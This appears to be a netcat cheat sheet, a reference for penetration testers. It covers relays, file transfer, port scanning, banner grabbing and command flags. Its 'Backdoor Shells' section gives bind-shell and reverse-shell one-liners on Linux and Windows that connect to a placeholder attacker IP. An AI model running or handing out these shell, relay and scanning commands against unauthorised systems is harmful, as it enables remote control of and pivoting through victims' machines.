1. Fundamentals

1. nc [target-ip] [port]

1. client to listener

2. nc -lp [port]

1. create listener

2. NetCat Relay on Windows

3. c:\> cd c:\tmp

1. create temp dir for the .bat file(s)

4. c:\> echo nc [target-ip] [port] >relay.bat
5. c:\> nc -l -p [localport] -e relay.bat

1. Above will relay from NC listen to NC client
2. relay packets from local port [localport] to NC client connected to [target-ip] on port [port]

6. c:\>echo nc [target-ip] [port] >relay.bat
7. nc [source-IP] [Source-port] -e relay.bat

1. Above will relay from NC client to NC client
2. relay that will route packets from the connection to [source-ip] on [source-port] to a NC client connected to [target-ip] on [target-port]

8. c:\>echo  nc -l -p [local-port-2] >relay.bat
9. c:\>nc -l -p [local-port-1] -e relay.bat

1. relay from NC listener to NC listener
2. ceate relay routing packets from any connection connected to [local-port-1] to any connection connected to [local-port-2]

3. Files push/pull

10. # nc [target-ip] [port] <[infile]

1. push a file

11. #nc -l -w3 -p [local-port] <[outfile]

1. pull a file that is being pushed, close connection after 3 seconds
2. time to wait can be adjusted

4. NetCat port scanner

12. # nc -v -n -z -w1 [target-ip] [start-port] -[end-port]

1. attempt connection on ports [start]-[end]
2. run verbosely -v
3. not resolve names -n
4. no sending of data -z
5. wait for 1 second for connection -w1
6. option: randomize ports -r

5. TCP Banner Grubber

13. #echo “” |nc -v -n -w1 [target-ip] [start-port]-[end-port]

1. send blank string to get banner.

6. Backdoor Shells

14. # nc -l -p [port] -e /bin/sh

1. shell on linux

15. c:\> nc -l -p [port] -e cmd.exe

1. shell on windows

16. # nc [attacker-ip] [port] -e /bin/sh

1. reverse shell on linux

17. c:\>nc [attacker-ip] [port] -e cmd.exe

1. reverse shell on windows

7. NetCat Relays on Linux

18. cd /tmp
19. mknod backpipe p

1. create FIFO called backpipe

20. nc -l -p [local-port] 0<backpipe |nc [target-ip] [trgt-port] | tee backpipe

1. relay from NC listener to NC Client
2. route packets from [local-port] to NC Client connected to [target-ip] on [trgt-port]

21. nc [source-ip] [src-port] 0<backpipe |nc [target-ip] [trgt-port] | tee backpipe

1. relay from NC client to NC Client
2. route packets from connection on [source-IP] [src-port] to a NC client connected to {target-ip] [trgt-port]

22. nc -l -p [local-port-1] 0<backpipe |nc -l -p [local-port-2] | tee backpipe

1. relay from NC Listener to NC Listener
2. route packets from any connection connected to port [local-port-1] toany connection connected to [local-port-2]

8. NetCat command Flags

23. nc -[options] [target-ip] [port/s]

1. listen -l
2. listen harder(persistant, start listen again after disconnect) -L
3. UDP mode (default is TCP) -u
4. Local Port -p
5. Execute program after conn. - e
6. no dns lookup -n
7. zero-data, do not send any data  -z
8. timout for disconnect -w#
9. verbose out -v
10. very verbose -vv